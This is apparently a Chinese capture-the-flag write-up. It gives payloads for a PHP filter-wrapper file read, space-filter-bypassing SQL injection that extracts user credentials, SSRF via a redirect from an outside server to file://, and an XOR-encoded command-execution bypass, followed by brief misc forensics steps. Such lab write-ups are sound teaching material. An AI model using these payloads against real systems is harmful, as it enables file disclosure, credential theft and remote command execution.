Web

Code

?input1=php://filter/convert.base64-encode/resource=flag.php&input2=data:text/plain,Welcome!&input3=s:4:”time”;

input1 ,input2用php伪协议

input3简单的反序列化

web2

忘了叫啥了，反正是个sql注入

注入点是id=

测试时空格被过滤

注入过程中发现目的不是查到数据库中的flag而是找到用户名和密码

目录扫描找到login.php

id=0%27/**/union/**/select/**/1,(select/**/username/**/from/**/users),3||%27

id=0%27/**/union/**/select/**/1,(select/**/password/**/from/**/users),3||%27

邂逅Redis

源码中有个标签指向百度

复制到url发现可以ssrf

可以再自己服务器上建立一个302重定向再用file协议跳转到flag的php文件

http://103.213.97.75:59479/?url=http://139.9.40.218:7777/index.php

RCEME

有字符限制，只能用固定字符

用字符拼接和异或运算可以绕过

calc=(‘|||’^’…’^’213’).(‘*~’^’^^’).’*’.(‘|’^’.’^’2′)

`cat *`

Misc

simple

1.随波逐流爆破zip密码

2.解压后用neta分析usb流量文件

3.找个网站反转

usb

1.Neta一把梭usb流量得到提示

2.分析流量包找到两个IRPID

IRP ID: 0xffff8285beacca60

IRP ID: 0xffff8285cae02a60

排列组合发现是flag{ffff8285beacca60ffff8285beacca60}

中秋

1.图片的宽高不对，计算得知图片的宽应该为

7372800/3/1920=1280

• 将1920*960改为1920*1280，得到密码

3.打开txt后发现大小不对，是零宽字符

4.随波逐流一把梭

日志